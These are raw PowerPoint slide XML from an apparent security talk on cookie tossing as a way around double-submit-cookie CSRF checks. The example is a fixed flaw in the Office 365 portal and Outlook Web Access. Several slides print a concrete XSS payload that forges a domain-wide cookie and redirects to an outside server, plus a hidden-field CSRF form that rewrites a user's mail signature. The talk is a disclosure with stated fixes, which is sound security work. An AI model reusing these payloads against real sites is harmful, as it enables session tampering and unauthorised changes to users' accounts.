              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>company.com; path=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0"/>
              <a:t>/admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Google Browser Security Handbook</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>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696" y="3657600"/>
            <a:ext cx="5791200" cy="277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1" y="4603690"/>
            <a:ext cx="7972125" cy="57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181" y="4205102"/>
            <a:ext cx="803486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736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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Toss the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie” up</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Find XSS on a subdomain of the shared root domain(.microsoft.com, .wordpress.com, .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>msn.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, .microsoftonline.com, .live.com, etc.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>THIS IS SUPER EASY in the presence of a high number of subdomains.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Through that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>try and set cookies that will “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>win,” or in other words, first in the string.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="228791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Cookie Tossing CSRF: the Quickening</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1600200"/>
            <a:ext cx="8915400" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This type of Cross Site Request Forgery token verification should be avoided.  Sometimes called “Double Submit Cookies”:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Request.QueryString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>CsrfToken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>]==</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Request.Cookies</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>CsrfTokenCookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>].Value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>)  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>{ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>/*Perform Authenticated Write Operation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>proves that the request originated from someone who can write cookies.  Who? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Any active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>MitM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> can force you to browse to a non-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>ssl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> version of the site, and inject cookies. (Cookie Forcing)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ANY XSS in a sibling domain</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="306838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CSRF Mitigation Bypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We found that type of CSRF protection during development of the Office 365 portal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Ajax functions performing updates </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Compared </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>querystring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> value to cookie value as CSRF mitigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Shared the “microsoftonline.com” domain space with an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> vulnerable subdomain (third party)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2872314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SRFBOXWithPics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92831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Office365 CSRF Mitigation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security Engineering was involved with the fix</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Portal now submits a header with the hash value of a session specific value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The Office365 portal is now better.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2805671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 and OWA too</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>I was bragging about this to Rich Lundeen . . .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The exploit was IDENTICAL in Outlook Web Access, except instead of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>querystring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, a POST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> was needed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Let’s look at it in a little more detail.</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219825" cy="4952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647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exploit</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a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>editorial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>.microsoftonline.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>/content/customizetree.aspx?id="&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>script&gt;document.cookie = "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>UserContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>deadbeefdeadbeefdeadbeefdeadbeef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>path=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>owa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="0070C0"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>domain=.microsoftonline.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>; expires=Wed, 16-Nov-2012 22:38:05 GMT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>;";</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>window.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>="http://totallyunrelatedserver.com/t.html";&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="479899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Clickjacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://www.itwasntme.co.uk/blogs/wp-content/plugins/rss-poster/cache/675e7_tsunami-whale-surv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5867400" cy="508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84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exploit (cont.)</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a:t>&lt;form id="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dynForm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" action="https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>://mybetamail</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>.microsoftonline.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:solidFill>
                    <a:srgbClr val="00B050"/>
                  </a:solidFill>
                </a:ln>
              </a:rPr>
              <a:t>owa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Options&amp;t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=Messaging" method="post" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>enctype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>application/x-www-form-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urlencoded</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>input type="hidden" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>txtSg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" value="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>BEST+is+Tossing+Cookies+all+over+your+signature</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"/&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>input type="hidden" name="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>hidcanary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>deadbeefdeadbeefdeadbeefdeadbeef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>"/&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>form&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1579730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here’s what’s sent to the server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="1600200"/>
            <a:ext cx="8534400" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>hidcanary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>deadbeefdeadbeefdeadbeefdeadbeef;hidcanary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>=a9e3fc90d1e4c7d5a4e643a2ae01c67f</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2899435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Exploited</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86854" y="2152650"/>
            <a:ext cx="7718946"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79882"/>
            <a:ext cx="8686800" cy="268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428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OWA Fix</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
